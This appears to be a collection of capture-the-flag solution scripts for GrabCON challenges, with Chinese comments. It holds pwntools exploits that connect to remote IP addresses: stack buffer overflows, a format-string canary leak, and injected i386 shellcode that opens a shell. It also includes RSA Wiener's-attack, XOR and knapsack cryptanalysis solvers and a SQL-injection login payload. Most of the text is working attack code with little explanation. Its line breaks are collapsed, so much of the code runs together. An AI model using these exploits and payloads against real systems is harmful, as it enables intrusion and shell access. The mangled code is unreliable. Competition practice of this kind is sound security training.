from pwn import *sh=remote("35.205.161.145",49153)shell=0x401146payload=b'a'*0x38+p64(shell)sh.sendline(payload)sh.interactive()

from pwn import *sh=remote("35.246.42.94",31337)sh.recvline()payload1=b'%31$p'sh.sendline(payload1)canary=int(sh.recvline(),16)print(canary)system=0x08049236payload2=b'a'*0x64+p32(canary)+b'b'*12+p32(system)sh.sendline(payload2)sh.interactive()

from pwn import *sh=remote('35.246.42.94',1337)sh.recvuntil('some ')addr=sh.recvuntil('!')[-11:-1]print(addr)addr=int(addr,16)shellcode=asm(shellcraft.i386.sh(),arch = 'i386', os = 'linux')payload=shellcode+b'a'*(0x12a-len(shellcode)+4)+p32(addr)sh.sendline(payload)sh.interactive()

n = 498934084350094415783044823223130007435556803301613073259727203199325937230080661117917023582579699673759861892703348357714077684549303787581429366922208568924252052118455313229534699860304480039147103608782140303489222166267907007839021544433148286217133494762766492655602977085105487216032806292874190551319e = 134901827939710543990222584187396847806193644190423846456160711527109836908087675183249532946675670587286594441908191054495871501233678465783530503352727362726294270065122447852357566161748618195216611965946646411519602447104878893524856862722902833460104389620397589021732407447981724307130484482495521398799c = 100132888193232309251839777842498074992587507373917163874335385921940537055226546911990198769720313749286675018486390873216490470403470144298153410686092752282228631590006943913867497072931343354481759219425807850047083814816718302223434388744485547550941814186146959750515114700335721173624212499886218608818import hashlibfrom Crypto.Util.number import *from gmpy2 import *class ContinuedFraction():    def __init__(self , numerator, denumerator):        self.numberlist = []    #number in continued fraction        self.fractionlist = []  #the near fraction list        self.GenerateNumberList(numerator , denumerator)        self.GenerateFractionList()
    def GenerateNumberList(self,numerator,denumerator):
        while numerator != 1:            quotient = numerator//denumerator            remainder = numerator % denumerator            self.numberlist.append(quotient)            numerator = denumerator            denumerator = remainder        def GenerateFractionList(self):        self.fractionlist.append([self.numberlist[0] ,1 ])        for i in range(1,len(self.numberlist)):            numerator = self.numberlist[i]            denumerator = 1            for j in range(i):                temp = numerator                numerator = denumerator + numerator * self.numberlist[i-j-1]                denumerator = temp            self.fractionlist.append([numerator,denumerator])            def Solve(a , b , c):    '''solve ax^2+bx+c=0 , return x1 , x2'''    delta = b**2 - 4 * a * c    if delta < 0:        return 0    if is_square(delta):        sqr_delta = isqrt(delta)        temp1 = -b + sqr_delta        temp2 = -b - sqr_delta        if temp1 % (2*a) != 0 or temp2 % (2*a) != 0:            return 0        else:            return [temp1//(2*a) , temp2//(2*a)]    else:        return 0def WienersAttack(e , N):    a = ContinuedFraction(e , N)    for i in a.fractionlist:        k = i[0]        d = i[1]        if k == 0:            continue        fai_N = (d * e - 1) // k        b = fai_N - N - 1        temp = Solve(1 , b , N)        if isinstance(temp ,list):            #print(d)            p ,q = temp            return d , p , q
d, p, q = WienersAttack(e, n)m=pow(c,d,n)print(long_to_bytes(m))#得到m为b'e=2,c=9019127052844164572606928250741960583163943438936945828390420331200602392329'#对c开根号得到flag:GrabCON{((^_^))}

enc = b'\x0cYUV\x02\x13\x16\x1a\x01\x04\x05C\x00\twcx|z(((%.)=K%(>'enc1 = b'\x0bPPS\r\x0b\x02\x0f\x12\r\x03_G\t\x08yb}v+--*+*8=W,>'enc2 = b'\x07A[\x06\\\r\x15\t\x04\x07\x18VG]U]@\x02\x08&9&%\' 41".;'import codecsimport random'''class pass_w:    x = "hjlgyjgyj10hadanvbwdmkw00OUONBADANKHM;IMMBMZCNihaillm"    def encode(self, text, i = -1):        
        if i < 0 or i > len(self.x) + 1:            i = random.randint(0, len(self.x) + 1)
        out = chr(i)        for c in text:            out += chr(ord(c) ^ ord(self.x[i]))            i = (i + 1)%79                 
        return codecs.encode(out)'''x = "hjlgyjgyj10hadanvbwdmkw00OUONBADANKHM;IMMBMZCNihaillm"text=codecs.decode(enc1)i=ord(text[0])password=''for t in range(1,len(text)):  password+=chr(ord(text[t])^ord(x[i]))  i=(i+1)%79print(password)#得到password为817letmein40986728ilikeapples，用GrabCON包裹即为flag

M, s, l, C = 7777771, [], 1337, [] n=[]flag = "REDACTED"k = [list(map(int, list(' '.join(bin(ord(i))[2:]).split()))) for i in flag]def num_gen(first, last):
   o = [[1]]                          cnt = 1                               while cnt <= last:       if cnt >= first:           yield o[-1][0]                  row = [o[-1][-1]]                   for b in o[-1]:        row.append(row[-1] + b)         cnt += 1                              o.append(row)        for i in num_gen(7, 13):       s.append(i)            for i in range(len(s)):    ni = ((l*s[i]) % M)               n.append(ni)for p in k:    C_curr = []    for (x,y) in zip(p, n):        C_ = x*y        C_curr.append(C_)    C += [sum(C_curr)]print(M, s, l, C, n)#M = 7777771#s = [203,877,4140,21147,115975,678570,4213597]#l = 1337#C = [15051976, 12005794, 3916945, 6470614, 7771050, 19992202, 17519217, 19419005, 13883825, 18691766, 13988655, 6979140, 14478779, 13988655, 8943599, 13883825, 25527382, 6384186, 13988655, 16461640, 25527382, 16224525, 6707729, 21488294, 25527382, 14392351, 6707729, 16733051, 12005794, 25527382, 6470614, 3916945, 7771050, 12711276, 21673277]

import binasciipubKey=[271411, 1172549, 5535180, 4940226, 7280926, 5026654, 2472985]nbit = len(pubKey)c = [15051976, 12005794, 3916945, 6470614, 7771050, 19992202, 17519217, 19419005, 13883825, 18691766, 13988655, 6979140, 14478779, 13988655, 8943599, 13883825, 25527382, 6384186, 13988655, 16461640, 25527382, 16224525, 6707729, 21488294, 25527382, 14392351, 6707729, 16733051, 12005794, 25527382, 6470614, 3916945, 7771050, 12711276, 21673277]f=''for i in range(len(c)):
  encoded = c[i]  #encoded=273226919366677  print "start"  # create a large matrix of 0's (dimensions are public key length +1)  A = Matrix(ZZ, nbit + 1, nbit + 1)  # fill in the identity matrix  for i in xrange(nbit):      A[i, i] = 1  # replace the bottom row with your public key  for i in xrange(nbit):      A[i, nbit] = pubKey[i]  # last element is the encoded message  A[nbit, nbit] = -int(encoded)
  res = A.LLL()  for i in range(0, nbit + 1):      # print solution      M = res.row(i).list()      flag = True      for m in M:          if m != 0 and m != 1:              flag = False              break      if flag:          print i, M          M = ''.join(str(j) for j in M)          # remove the last bit          M = M[:-1]          M = chr(int(M, 2))    print M    f+=M    print f#得到flag为GrabCON{kn4ps4ck_h45_g07_y0ur_baCK}

username=admin'or 1=1#password=admin'or 1=1#

for i in divisors(v5)://这里的v5是上述等式的左边部分    j=v5//i    if(i+j)%1338==0:        tmp=i-(i+j)//1338        if tmp%1336==0:            x=tmp//1336            y=(j-(i+j)//1338)//1336      print x,y